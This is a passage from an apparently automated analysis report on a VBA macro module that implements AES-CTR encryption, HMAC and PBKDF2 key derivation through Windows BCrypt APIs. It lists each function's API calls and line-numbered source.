28	Private Declare PtrSafe Function BCryptGenerateSymmetricKey Lib "bcrypt" (ByVal hAlgorithm as LongPtr, phKey as LongPtr, pbKeyObject as Any, ByVal cbKeyObject as Long, pbSecret as Any, ByVal cbSecret as Long, ByVal dwFlags as Long) as Long
29	Private Declare PtrSafe Function BCryptDestroyKey Lib "bcrypt" (ByVal hKey as LongPtr) as Long
30	Private Declare PtrSafe Function BCryptEncrypt Lib "bcrypt" (ByVal hKey as LongPtr, pbInput as Any, ByVal cbInput as Long, ByVal pPaddingInfo as LongPtr, ByVal pbIV as LongPtr, ByVal cbIV as Long, pbOutput as Any, ByVal cbOutput as Long, pcbResult as Long, ByVal dwFlags as Long) as Long
31	Private Declare PtrSafe Function BCryptDeriveKeyPBKDF2 Lib "bcrypt" (ByVal hPrf as LongPtr, pbPassword as Any, ByVal cbPassword as Long, pbSalt as Any, ByVal cbSalt as Long, ByVal cIterations as Currency, pbDerivedKey as Any, ByVal cbDerivedKey as Long, ByVal dwFlags as Long) as Long
32	Private Declare PtrSafe Function BCryptCreateHash Lib "bcrypt" (ByVal hAlgorithm as LongPtr, phHash as LongPtr, ByVal pbHashObject as LongPtr, ByVal cbHashObject as Long, pbSecret as Any, ByVal cbSecret as Long, ByVal dwFlags as Long) as Long
33	Private Declare PtrSafe Function BCryptDestroyHash Lib "bcrypt" (ByVal hHash as LongPtr) as Long
34	Private Declare PtrSafe Function BCryptHashData Lib "bcrypt" (ByVal hHash as LongPtr, pbInput as Any, ByVal cbInput as Long, ByVal dwFlags as Long) as Long
35	Private Declare PtrSafe Function BCryptFinishHash Lib "bcrypt" (ByVal hHash as LongPtr, pbOutput as Any, ByVal cbOutput as Long, ByVal dwFlags as Long) as Long
36	#else

Non-Executed Functions

Function
pvCryptoAesCtrInitAPIs: 45, Strings: 6, Number of lines: 62, Relevance: 91.062

APIs	Meta Information
vbNullString
vbNullString
AES_IVLEN
UBound
BCryptOpenAlgorithmProvider
StrPtr
KDF_HASH
MS_PRIMITIVE_PROVIDER
BCRYPT_ALG_HANDLE_HMAC_FLAG
BCryptDeriveKeyPBKDF2
pvArrayPtr
pvArraySize
KDF_ITER
UBound
BCryptOpenAlgorithmProvider
StrPtr
MS_PRIMITIVE_PROVIDER
BCryptGetProperty
StrPtr
BCryptSetProperty
StrPtr
BCryptGenerateSymmetricKey
CopyMemory
AES_IVLEN
BCryptOpenAlgorithmProvider
StrPtr
HMAC_HASH
MS_PRIMITIVE_PROVIDER
BCRYPT_ALG_HANDLE_HMAC_FLAG
BCryptGetProperty
StrPtr
BCryptCreateHash
AES_IVLEN
LastError
Part of subcall function GetSystemMessage@Module3: Space$
Part of subcall function GetSystemMessage@Module3: FormatMessage
Part of subcall function GetSystemMessage@Module3: FORMAT_MESSAGE_FROM_SYSTEM
Part of subcall function GetSystemMessage@Module3: FORMAT_MESSAGE_IGNORE_INSERTS
Part of subcall function GetSystemMessage@Module3: Len
Part of subcall function GetSystemMessage@Module3: Mid$
Part of subcall function GetSystemMessage@Module3: vbCrLf
Part of subcall function GetSystemMessage@Module3: Left$
Part of subcall function GetSystemMessage@Module3: Hex
LastError
ERR_UNSUPPORTED_ENCR

Strings	Decrypted Strings
"Microsoft Primitive Provider"
"AES"
"ObjectLength"
"ChainingMode"
"ChainingModeECB"
"HashDigestLength"

Line	Instruction	Meta Information
299	Private Function pvCryptoAesCtrInit(uCtx as UcsCryptoContextType, baPass() as Byte, baSalt() as Byte, baDerivedKey() as Byte, ByVal lKeyLen as Long) as Boolean
300	Const MS_PRIMITIVE_PROVIDER as String = "Microsoft Primitive Provider"
301	Const BCRYPT_ALG_HANDLE_HMAC_FLAG as Long = 8
302	Dim hResult as Long
304	With uCtx
306	. EncrData = vbNullString	vbNullString
307	. EncrPos = 0
308	. LastError = vbNullString	vbNullString
309	Redim Preserve baDerivedKey(0 To lKeyLen + AES_IVLEN - 1)	AES_IVLEN
310	If UBound(baPass) >= 0 Or UBound(baSalt) >= 0 Then	UBound
312	On Error Goto EH_Unsupported
313	hResult = BCryptOpenAlgorithmProvider(. hPbkdf2Alg, StrPtr(KDF_HASH), StrPtr(MS_PRIMITIVE_PROVIDER), BCRYPT_ALG_HANDLE_HMAC_FLAG)	BCryptOpenAlgorithmProvider StrPtr KDF_HASH MS_PRIMITIVE_PROVIDER BCRYPT_ALG_HANDLE_HMAC_FLAG
314	If hResult < 0 Then
315	Goto QH
316	Endif
317	hResult = BCryptDeriveKeyPBKDF2(. hPbkdf2Alg, ByVal pvArrayPtr(baPass), pvArraySize(baPass), ByVal pvArrayPtr(baSalt), pvArraySize(baSalt), KDF_ITER / 10000@, baDerivedKey(0), UBound(baDerivedKey) + 1, 0)	BCryptDeriveKeyPBKDF2 pvArrayPtr pvArraySize KDF_ITER UBound
319	If hResult < 0 Then
320	Goto QH
321	Endif
322	On Error Goto 0
323	Endif
325	On Error Goto EH_Unsupported
326	hResult = BCryptOpenAlgorithmProvider(. hAesAlg, StrPtr("AES"), StrPtr(MS_PRIMITIVE_PROVIDER), 0)	BCryptOpenAlgorithmProvider StrPtr MS_PRIMITIVE_PROVIDER
327	If hResult < 0 Then
328	Goto QH
329	Endif
330	On Error Goto 0
331	hResult = BCryptGetProperty(. hAesAlg, StrPtr("ObjectLength"), . AesKeyObjLen, 4, 0, 0)	BCryptGetProperty StrPtr
332	If hResult < 0 Then
333	Goto QH
334	Endif
335	hResult = BCryptSetProperty(. hAesAlg, StrPtr("ChainingMode"), StrPtr("ChainingModeECB"), 30, 0)	BCryptSetProperty StrPtr
336	If hResult < 0 Then
337	Goto QH
338	Endif
339	ReDim .AesKeyObjData(0 To .AesKeyObjLen - 1) As Byte ' BAD !
340	hResult = BCryptGenerateSymmetricKey(. hAesAlg, . hAesKey, . AesKeyObjData(0), . AesKeyObjLen, baDerivedKey(0), lKeyLen, 0)	BCryptGenerateSymmetricKey
341	If hResult < 0 Then
342	Goto QH
343	Endif
345	Call CopyMemory(. Nonce(0), baDerivedKey(lKeyLen), AES_IVLEN)	CopyMemory AES_IVLEN
347	hResult = BCryptOpenAlgorithmProvider(. hHmacAlg, StrPtr(HMAC_HASH), StrPtr(MS_PRIMITIVE_PROVIDER), BCRYPT_ALG_HANDLE_HMAC_FLAG)	BCryptOpenAlgorithmProvider StrPtr HMAC_HASH MS_PRIMITIVE_PROVIDER BCRYPT_ALG_HANDLE_HMAC_FLAG
348	If hResult < 0 Then
349	Goto QH
350	Endif
351	hResult = BCryptGetProperty(. hHmacAlg, StrPtr("HashDigestLength"), . HashLen, 4, 0, 0)	BCryptGetProperty StrPtr
352	If hResult < 0 Then
353	Goto QH
354	Endif
355	hResult = BCryptCreateHash(. hHmacAlg, . hHmacHash, 0, 0, baDerivedKey(lKeyLen + AES_IVLEN - . HashLen), . HashLen, 0)	BCryptCreateHash AES_IVLEN
356	If hResult < 0 Then
357	Goto QH
358	Endif
359	End With
361	pvCryptoAesCtrInit = True
362	Exit Function
362	QH:
364	uCtx.LastError = GetSystemMessage(hResult)	LastError
365	Exit Function
365	EH_Unsupported:
367	uCtx.LastError = ERR_UNSUPPORTED_ENCR	LastError ERR_UNSUPPORTED_ENCR
368	End Function

Function
AesCryptArrayAPIs: 119, Strings: 0, Number of lines: 70, Relevance: 148.82

APIs	Meta Information
IsArray
IsMissing
vbNullString
IsArray
Part of subcall function ToUtf8Array@Module3: WideCharToMultiByte
Part of subcall function ToUtf8Array@Module3: CP_UTF8
Part of subcall function ToUtf8Array@Module3: StrPtr
Part of subcall function ToUtf8Array@Module3: Len
Part of subcall function ToUtf8Array@Module3: WideCharToMultiByte
Part of subcall function ToUtf8Array@Module3: CP_UTF8
Part of subcall function ToUtf8Array@Module3: StrPtr
Part of subcall function ToUtf8Array@Module3: Len
Part of subcall function ToUtf8Array@Module3: vbNullString
vbNullString
IsMissing
IsArray
Part of subcall function ToUtf8Array@Module3: WideCharToMultiByte
Part of subcall function ToUtf8Array@Module3: CP_UTF8
Part of subcall function ToUtf8Array@Module3: StrPtr
Part of subcall function ToUtf8Array@Module3: Len
Part of subcall function ToUtf8Array@Module3: WideCharToMultiByte
Part of subcall function ToUtf8Array@Module3: CP_UTF8
Part of subcall function ToUtf8Array@Module3: StrPtr
Part of subcall function ToUtf8Array@Module3: Len
Part of subcall function ToUtf8Array@Module3: vbNullString
vbNullString
IsArray
AES_KEYLEN
Part of subcall function pvCryptoAesCtrInit@Module3: vbNullString
Part of subcall function pvCryptoAesCtrInit@Module3: vbNullString
Part of subcall function pvCryptoAesCtrInit@Module3: AES_IVLEN
Part of subcall function pvCryptoAesCtrInit@Module3: UBound
Part of subcall function pvCryptoAesCtrInit@Module3: BCryptOpenAlgorithmProvider
Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr
Part of subcall function pvCryptoAesCtrInit@Module3: KDF_HASH
Part of subcall function pvCryptoAesCtrInit@Module3: MS_PRIMITIVE_PROVIDER
Part of subcall function pvCryptoAesCtrInit@Module3: BCRYPT_ALG_HANDLE_HMAC_FLAG
Part of subcall function pvCryptoAesCtrInit@Module3: BCryptDeriveKeyPBKDF2
Part of subcall function pvCryptoAesCtrInit@Module3: pvArrayPtr
Part of subcall function pvCryptoAesCtrInit@Module3: pvArraySize
Part of subcall function pvCryptoAesCtrInit@Module3: KDF_ITER
Part of subcall function pvCryptoAesCtrInit@Module3: UBound
Part of subcall function pvCryptoAesCtrInit@Module3: BCryptOpenAlgorithmProvider
Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr
Part of subcall function pvCryptoAesCtrInit@Module3: MS_PRIMITIVE_PROVIDER
Part of subcall function pvCryptoAesCtrInit@Module3: BCryptGetProperty
Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr
Part of subcall function pvCryptoAesCtrInit@Module3: BCryptSetProperty
Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr
Part of subcall function pvCryptoAesCtrInit@Module3: BCryptGenerateSymmetricKey
Part of subcall function pvCryptoAesCtrInit@Module3: CopyMemory
Part of subcall function pvCryptoAesCtrInit@Module3: AES_IVLEN
Part of subcall function pvCryptoAesCtrInit@Module3: BCryptOpenAlgorithmProvider
Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr
Part of subcall function pvCryptoAesCtrInit@Module3: HMAC_HASH
Part of subcall function pvCryptoAesCtrInit@Module3: MS_PRIMITIVE_PROVIDER
Part of subcall function pvCryptoAesCtrInit@Module3: BCRYPT_ALG_HANDLE_HMAC_FLAG
Part of subcall function pvCryptoAesCtrInit@Module3: BCryptGetProperty
Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr
Part of subcall function pvCryptoAesCtrInit@Module3: BCryptCreateHash
Part of subcall function pvCryptoAesCtrInit@Module3: AES_IVLEN
Part of subcall function pvCryptoAesCtrInit@Module3: LastError
Part of subcall function pvCryptoAesCtrInit@Module3: LastError
Part of subcall function pvCryptoAesCtrInit@Module3: ERR_UNSUPPORTED_ENCR
LastError
Part of subcall function pvCryptoAesCtrCrypt@Module3: pvArraySize
Part of subcall function pvCryptoAesCtrCrypt@Module3: BCryptHashData
Part of subcall function pvCryptoAesCtrCrypt@Module3: pvArrayPtr
Part of subcall function pvCryptoAesCtrCrypt@Module3: AES_BLOCK_SIZE
Part of subcall function pvCryptoAesCtrCrypt@Module3: AES_BLOCK_SIZE
Part of subcall function pvCryptoAesCtrCrypt@Module3: UBound
Part of subcall function pvCryptoAesCtrCrypt@Module3: AES_BLOCK_SIZE
Part of subcall function pvCryptoAesCtrCrypt@Module3: CopyMemory
Part of subcall function pvCryptoAesCtrCrypt@Module3: AES_BLOCK_SIZE
Part of subcall function pvCryptoAesCtrCrypt@Module3: BCryptEncrypt
Part of subcall function pvCryptoAesCtrCrypt@Module3: BCryptHashData
Part of subcall function pvCryptoAesCtrCrypt@Module3: pvArrayPtr
Part of subcall function pvCryptoAesCtrCrypt@Module3: LastError
LastError
IsArray
Part of subcall function pvCryptoGetFinalHash@Module3: HashLen
Part of subcall function pvCryptoGetFinalHash@Module3: BCryptFinishHash
Part of subcall function pvCryptoGetFinalHash@Module3: hHmacHash
Part of subcall function pvCryptoGetFinalHash@Module3: HashLen
UBound
Part of subcall function PeekPtr@Module3: CopyMemory
Part of subcall function PeekPtr@Module3: PTR_SIZE
VarPtr
Part of subcall function PeekPtr@Module3: CopyMemory
Part of subcall function PeekPtr@Module3: PTR_SIZE
VarPtr
Part of subcall function PeekPtr@Module3: CopyMemory
Part of subcall function PeekPtr@Module3: PTR_SIZE
VarPtr
VT_BYREF
Part of subcall function PeekPtr@Module3: CopyMemory
Part of subcall function PeekPtr@Module3: PTR_SIZE
Part of subcall function PeekPtr@Module3: CopyMemory
Part of subcall function PeekPtr@Module3: PTR_SIZE
Part of subcall function PeekPtr@Module3: CopyMemory
Part of subcall function PeekPtr@Module3: PTR_SIZE
CopyMemory
UBound
Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider
Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptDestroyHash
Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider
Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptDestroyKey
Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider
Array
Number
Err
Source
Description
Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider
Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptDestroyHash
Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider
Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptDestroyKey
Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider
Raise

Line	Instruction	Meta Information
186	Public Function AesCryptArray(baData() as Byte, optional Password as Variant, optional Salt as Variant, optional key as Variant, optional ByVal KeyLen as Long, optional Error as String, optional Hmac as Variant) as Boolean
194	Const VT_BYREF as Long = &H4000
195	Dim uCtx as UcsCryptoContextType
196	Dim vErr as Variant
197	Dim bHashBefore as Boolean
198	Dim bHashAfter as Boolean
199	Dim baPass() as Byte
200	Dim baSalt() as Byte
201	Dim baKey() as Byte
202	Dim baTemp() as Byte
203	Dim lPtr as LongPtr
205	On Error Goto EH
206	If IsArray(Hmac) Then	IsArray
207	bHashBefore = (Hmac(0) <= 0)
208	bHashAfter = (Hmac(0) > 0)
209	Endif
210	If IsMissing(Password) Then	IsMissing
211	baPass = vbNullString	vbNullString
212	Elseif IsArray(Password) Then	IsArray
213	baPass = Password
214	Else
215	baPass = ToUtf8Array(Password & vbNullString)	vbNullString
216	Endif
217	If IsMissing(Salt) Then	IsMissing
218	baSalt = baPass
219	Elseif IsArray(Salt) Then	IsArray
220	baSalt = Salt
221	Else
222	baSalt = ToUtf8Array(Salt & vbNullString)	vbNullString
223	Endif
224	If IsArray(key) Then	IsArray
225	baKey = key
226	Endif
227	If KeyLen <= 0 Then
228	KeyLen = AES_KEYLEN	AES_KEYLEN
229	Endif
230	If Not pvCryptoAesCtrInit(uCtx, baPass, baSalt, baKey, KeyLen) Then
231	Error = uCtx.LastError	LastError
232	Goto QH
233	Endif
234	If Not pvCryptoAesCtrCrypt(uCtx, baData, HashBefore := bHashBefore, HashAfter := bHashAfter) Then
235	Error = uCtx.LastError	LastError
236	Goto QH
237	Endif
238	If IsArray(Hmac) Then	IsArray
239	baTemp = pvCryptoGetFinalHash(uCtx, UBound(Hmac) + 1)	UBound
240	#if Win64 then
241	lPtr = PeekPtr(VarPtr(Hmac) + 8)	VarPtr
242	#else
243	lPtr = PeekPtr((VarPtr(Hmac) Xor &H80000000) + 8 Xor &H80000000)	VarPtr
244	#endif
245	If (PeekPtr(VarPtr(Hmac)) And VT_BYREF) <> 0 Then	VarPtr VT_BYREF
246	lPtr = PeekPtr(lPtr)
247	Endif
248	#if Win64 then
249	lPtr = PeekPtr(lPtr + 16)
250	#else
251	lPtr = PeekPtr((lPtr Xor &H80000000) + 12 Xor &H80000000)
252	#endif
253	Call CopyMemory(ByVal lPtr, baTemp(0), UBound(baTemp) + 1)	CopyMemory UBound
254	Endif
256	AesCryptArray = True
256	QH:
258	pvCryptoAesCtrTerminate uCtx
259	Exit Function
259	EH:
261	vErr = Array(Err.Number, Err.Source, Err.Description)	Array Number Err Source Description
262	pvCryptoAesCtrTerminate uCtx
263	Err.Raise vErr(0), vErr(1), vErr(2)	Raise
264	End Function

Function
AesEncryptStringAPIs: 83, Strings: 0, Number of lines: 32, Relevance: 103.782

APIs	Meta Information
OPENSSL_MAGICLEN
KDF_SALTLEN
Part of subcall function ToUtf8Array@Module3: WideCharToMultiByte
Part of subcall function ToUtf8Array@Module3: CP_UTF8
Part of subcall function ToUtf8Array@Module3: StrPtr
Part of subcall function ToUtf8Array@Module3: Len
Part of subcall function ToUtf8Array@Module3: WideCharToMultiByte
Part of subcall function ToUtf8Array@Module3: CP_UTF8
Part of subcall function ToUtf8Array@Module3: StrPtr
Part of subcall function ToUtf8Array@Module3: Len
Part of subcall function ToUtf8Array@Module3: vbNullString
vbNullString
vbNullString
IsArray
IsMissing
Part of subcall function ToUtf8Array@Module3: WideCharToMultiByte
Part of subcall function ToUtf8Array@Module3: CP_UTF8
Part of subcall function ToUtf8Array@Module3: StrPtr
Part of subcall function ToUtf8Array@Module3: Len
Part of subcall function ToUtf8Array@Module3: WideCharToMultiByte
Part of subcall function ToUtf8Array@Module3: CP_UTF8
Part of subcall function ToUtf8Array@Module3: StrPtr
Part of subcall function ToUtf8Array@Module3: Len
Part of subcall function ToUtf8Array@Module3: vbNullString
vbNullString
KDF_SALTLEN
RtlGenRandom
KDF_SALTLEN
Part of subcall function AesCryptArray@Module3: IsArray
Part of subcall function AesCryptArray@Module3: IsMissing
Part of subcall function AesCryptArray@Module3: vbNullString
Part of subcall function AesCryptArray@Module3: IsArray
Part of subcall function AesCryptArray@Module3: vbNullString
Part of subcall function AesCryptArray@Module3: IsMissing
Part of subcall function AesCryptArray@Module3: IsArray
Part of subcall function AesCryptArray@Module3: vbNullString
Part of subcall function AesCryptArray@Module3: IsArray
Part of subcall function AesCryptArray@Module3: AES_KEYLEN
Part of subcall function AesCryptArray@Module3: LastError
Part of subcall function AesCryptArray@Module3: LastError
Part of subcall function AesCryptArray@Module3: IsArray
Part of subcall function AesCryptArray@Module3: UBound
Part of subcall function AesCryptArray@Module3: VarPtr
Part of subcall function AesCryptArray@Module3: VarPtr
Part of subcall function AesCryptArray@Module3: VarPtr
Part of subcall function AesCryptArray@Module3: VT_BYREF
Part of subcall function AesCryptArray@Module3: CopyMemory
Part of subcall function AesCryptArray@Module3: UBound
Part of subcall function AesCryptArray@Module3: Array
Part of subcall function AesCryptArray@Module3: Number
Part of subcall function AesCryptArray@Module3: Err
Part of subcall function AesCryptArray@Module3: Source
Part of subcall function AesCryptArray@Module3: Description
Part of subcall function AesCryptArray@Module3: Raise
Raise
vbObjectError
IsArray
UBound
PREFIXLEN
UBound
PREFIXLEN
CopyMemory
PREFIXLEN
UBound
CopyMemory
OPENSSL_MAGICLEN
KDF_SALTLEN
CopyMemory
OPENSSL_MAGIC
OPENSSL_MAGICLEN
Replace
Part of subcall function ToBase64Array@Module3: UBound
Part of subcall function ToBase64Array@Module3: String$
Part of subcall function ToBase64Array@Module3: UBound
Part of subcall function ToBase64Array@Module3: Len
Part of subcall function ToBase64Array@Module3: CryptBinaryToString
Part of subcall function ToBase64Array@Module3: VarPtr
Part of subcall function ToBase64Array@Module3: UBound
Part of subcall function ToBase64Array@Module3: CRYPT_STRING_BASE64
Part of subcall function ToBase64Array@Module3: StrPtr
Part of subcall function ToBase64Array@Module3: Left$
vbCrLf
vbNullString

Line	Instruction	Meta Information
112	Public Function AesEncryptString(sText as String, optional Password as Variant) as String
113	Const PREFIXLEN as Long = OPENSSL_MAGICLEN + KDF_SALTLEN	OPENSSL_MAGICLEN KDF_SALTLEN
114	Dim baData() as Byte
115	Dim baPass() as Byte
116	Dim baSalt() as Byte
117	Dim baKey() as Byte
118	Dim sError as String
120	baData = ToUtf8Array(sText)
121	baPass = vbNullString	vbNullString
122	baSalt = vbNullString	vbNullString
123	If Not IsArray(Password) Then	IsArray
124	If Not IsMissing(Password) Then	IsMissing
125	baPass = ToUtf8Array(Password & vbNullString)	vbNullString
126	Endif
127	Redim baSalt(0 To KDF_SALTLEN - 1)	KDF_SALTLEN
128	Call RtlGenRandom(baSalt(0), KDF_SALTLEN)	RtlGenRandom KDF_SALTLEN
129	Else
130	baKey = Password
131	Endif
132	If Not AesCryptArray(baData, baPass, baSalt, baKey, Error := sError) Then
133	Err.Raise vbObjectError, , sError	Raise vbObjectError
134	Endif
135	If Not IsArray(Password) Then	IsArray
136	Redim Preserve baData(0 To UBound(baData) + PREFIXLEN)	UBound PREFIXLEN
137	If UBound(baData) >= PREFIXLEN Then	UBound PREFIXLEN
138	Call CopyMemory(baData(PREFIXLEN), baData(0), UBound(baData) + 1 - PREFIXLEN)	CopyMemory PREFIXLEN UBound
139	Endif
140	Call CopyMemory(baData(OPENSSL_MAGICLEN), baSalt(0), KDF_SALTLEN)	CopyMemory OPENSSL_MAGICLEN KDF_SALTLEN
141	Call CopyMemory(baData(0), ByVal OPENSSL_MAGIC, OPENSSL_MAGICLEN)	CopyMemory OPENSSL_MAGIC OPENSSL_MAGICLEN
142	Endif
143	AesEncryptString = Replace(ToBase64Array(baData), vbCrLf, vbNullString)	Replace vbCrLf vbNullString
144	End Function

Function
AesDecryptStringAPIs: 79, Strings: 0, Number of lines: 37, Relevance: 98.787

APIs	Meta Information
OPENSSL_MAGICLEN
KDF_SALTLEN
Part of subcall function FromBase64Array@Module3: Len
Part of subcall function FromBase64Array@Module3: CryptStringToBinary
Part of subcall function FromBase64Array@Module3: StrPtr
Part of subcall function FromBase64Array@Module3: Len
Part of subcall function FromBase64Array@Module3: CRYPT_STRING_BASE64
Part of subcall function FromBase64Array@Module3: VarPtr
Part of subcall function FromBase64Array@Module3: vbNullString
vbNullString
vbNullString
IsArray
IsMissing
Part of subcall function ToUtf8Array@Module3: WideCharToMultiByte
Part of subcall function ToUtf8Array@Module3: CP_UTF8
Part of subcall function ToUtf8Array@Module3: StrPtr
Part of subcall function ToUtf8Array@Module3: Len
Part of subcall function ToUtf8Array@Module3: WideCharToMultiByte
Part of subcall function ToUtf8Array@Module3: CP_UTF8
Part of subcall function ToUtf8Array@Module3: StrPtr
Part of subcall function ToUtf8Array@Module3: Len
Part of subcall function ToUtf8Array@Module3: vbNullString
vbNullString
UBound
PREFIXLEN
String$
OPENSSL_MAGICLEN
CopyMemory
OPENSSL_MAGICLEN
OPENSSL_MAGIC
KDF_SALTLEN
CopyMemory
OPENSSL_MAGICLEN
KDF_SALTLEN
UBound
PREFIXLEN
CopyMemory
PREFIXLEN
UBound
UBound
PREFIXLEN
vbNullString
Part of subcall function AesCryptArray@Module3: IsArray
Part of subcall function AesCryptArray@Module3: IsMissing
Part of subcall function AesCryptArray@Module3: vbNullString
Part of subcall function AesCryptArray@Module3: IsArray
Part of subcall function AesCryptArray@Module3: vbNullString
Part of subcall function AesCryptArray@Module3: IsMissing
Part of subcall function AesCryptArray@Module3: IsArray
Part of subcall function AesCryptArray@Module3: vbNullString
Part of subcall function AesCryptArray@Module3: IsArray
Part of subcall function AesCryptArray@Module3: AES_KEYLEN
Part of subcall function AesCryptArray@Module3: LastError
Part of subcall function AesCryptArray@Module3: LastError
Part of subcall function AesCryptArray@Module3: IsArray
Part of subcall function AesCryptArray@Module3: UBound
Part of subcall function AesCryptArray@Module3: VarPtr
Part of subcall function AesCryptArray@Module3: VarPtr
Part of subcall function AesCryptArray@Module3: VarPtr
Part of subcall function AesCryptArray@Module3: VT_BYREF
Part of subcall function AesCryptArray@Module3: CopyMemory
Part of subcall function AesCryptArray@Module3: UBound
Part of subcall function AesCryptArray@Module3: Array
Part of subcall function AesCryptArray@Module3: Number
Part of subcall function AesCryptArray@Module3: Err
Part of subcall function AesCryptArray@Module3: Source
Part of subcall function AesCryptArray@Module3: Description
Part of subcall function AesCryptArray@Module3: Raise
Raise
vbObjectError
Part of subcall function FromUtf8Array@Module3: UBound
Part of subcall function FromUtf8Array@Module3: String$
Part of subcall function FromUtf8Array@Module3: UBound
Part of subcall function FromUtf8Array@Module3: MultiByteToWideChar
Part of subcall function FromUtf8Array@Module3: CP_UTF8
Part of subcall function FromUtf8Array@Module3: UBound
Part of subcall function FromUtf8Array@Module3: StrPtr
Part of subcall function FromUtf8Array@Module3: Len
Part of subcall function FromUtf8Array@Module3: Left$

Line	Instruction	Meta Information
147	Public Function AesDecryptString(sEncr as String, optional Password as Variant) as String
148	Const PREFIXLEN as Long = OPENSSL_MAGICLEN + KDF_SALTLEN	OPENSSL_MAGICLEN KDF_SALTLEN
149	Dim baData() as Byte
150	Dim baPass() as Byte
151	Dim baSalt() as Byte
152	Dim baKey() as Byte
153	Dim sMagic as String
154	Dim sError as String
156	baData = FromBase64Array(sEncr)
157	baPass = vbNullString	vbNullString
158	baSalt = vbNullString	vbNullString
159	If Not IsArray(Password) Then	IsArray
160	If Not IsMissing(Password) Then	IsMissing
161	baPass = ToUtf8Array(Password & vbNullString)	vbNullString
162	Endif
163	If UBound(baData) >= PREFIXLEN - 1 Then	UBound PREFIXLEN
164	sMagic = String$(OPENSSL_MAGICLEN, 0)	String$ OPENSSL_MAGICLEN
165	Call CopyMemory(ByVal sMagic, baData(0), OPENSSL_MAGICLEN)	CopyMemory OPENSSL_MAGICLEN
166	If sMagic = OPENSSL_MAGIC Then	OPENSSL_MAGIC
167	Redim baSalt(0 To KDF_SALTLEN - 1)	KDF_SALTLEN
168	Call CopyMemory(baSalt(0), baData(OPENSSL_MAGICLEN), KDF_SALTLEN)	CopyMemory OPENSSL_MAGICLEN KDF_SALTLEN
169	If UBound(baData) >= PREFIXLEN Then	UBound PREFIXLEN
170	Call CopyMemory(baData(0), baData(PREFIXLEN), UBound(baData) + 1 - PREFIXLEN)	CopyMemory PREFIXLEN UBound
171	Redim Preserve baData(0 To UBound(baData) - PREFIXLEN)	UBound PREFIXLEN
172	Else
173	baData = vbNullString	vbNullString
174	Endif
175	Endif
176	Endif
177	Else
178	baKey = Password
179	Endif
180	If Not AesCryptArray(baData, baPass, baSalt, baKey, Error := sError) Then
181	Err.Raise vbObjectError, , sError	Raise vbObjectError
182	Endif
183	AesDecryptString = FromUtf8Array(baData)
184	End Function

Function
AesChunkedInitAPIs: 46, Strings: 0, Number of lines: 13, Relevance: 57.513

APIs	Meta Information
Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider
Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptDestroyHash
Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider
Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptDestroyKey
Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider
m_uChunkedCtx
vbNullString
IsArray
AES_KEYLEN
Part of subcall function pvCryptoAesCtrInit@Module3: vbNullString
Part of subcall function pvCryptoAesCtrInit@Module3: vbNullString
Part of subcall function pvCryptoAesCtrInit@Module3: AES_IVLEN
Part of subcall function pvCryptoAesCtrInit@Module3: UBound
Part of subcall function pvCryptoAesCtrInit@Module3: BCryptOpenAlgorithmProvider
Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr
Part of subcall function pvCryptoAesCtrInit@Module3: KDF_HASH
Part of subcall function pvCryptoAesCtrInit@Module3: MS_PRIMITIVE_PROVIDER
Part of subcall function pvCryptoAesCtrInit@Module3: BCRYPT_ALG_HANDLE_HMAC_FLAG
Part of subcall function pvCryptoAesCtrInit@Module3: BCryptDeriveKeyPBKDF2
Part of subcall function pvCryptoAesCtrInit@Module3: pvArrayPtr
Part of subcall function pvCryptoAesCtrInit@Module3: pvArraySize
Part of subcall function pvCryptoAesCtrInit@Module3: KDF_ITER
Part of subcall function pvCryptoAesCtrInit@Module3: UBound
Part of subcall function pvCryptoAesCtrInit@Module3: BCryptOpenAlgorithmProvider
Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr
Part of subcall function pvCryptoAesCtrInit@Module3: MS_PRIMITIVE_PROVIDER
Part of subcall function pvCryptoAesCtrInit@Module3: BCryptGetProperty
Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr
Part of subcall function pvCryptoAesCtrInit@Module3: BCryptSetProperty
Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr
Part of subcall function pvCryptoAesCtrInit@Module3: BCryptGenerateSymmetricKey
Part of subcall function pvCryptoAesCtrInit@Module3: CopyMemory
Part of subcall function pvCryptoAesCtrInit@Module3: AES_IVLEN
Part of subcall function pvCryptoAesCtrInit@Module3: BCryptOpenAlgorithmProvider
Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr
Part of subcall function pvCryptoAesCtrInit@Module3: HMAC_HASH
Part of subcall function pvCryptoAesCtrInit@Module3: MS_PRIMITIVE_PROVIDER
Part of subcall function pvCryptoAesCtrInit@Module3: BCRYPT_ALG_HANDLE_HMAC_FLAG
Part of subcall function pvCryptoAesCtrInit@Module3: BCryptGetProperty
Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr
Part of subcall function pvCryptoAesCtrInit@Module3: BCryptCreateHash
Part of subcall function pvCryptoAesCtrInit@Module3: AES_IVLEN
Part of subcall function pvCryptoAesCtrInit@Module3: LastError
Part of subcall function pvCryptoAesCtrInit@Module3: LastError
Part of subcall function pvCryptoAesCtrInit@Module3: ERR_UNSUPPORTED_ENCR
m_uChunkedCtx

Line	Instruction	Meta Information
266	Public Function AesChunkedInit(optional key as Variant, optional ByVal KeyLen as Long) as Boolean
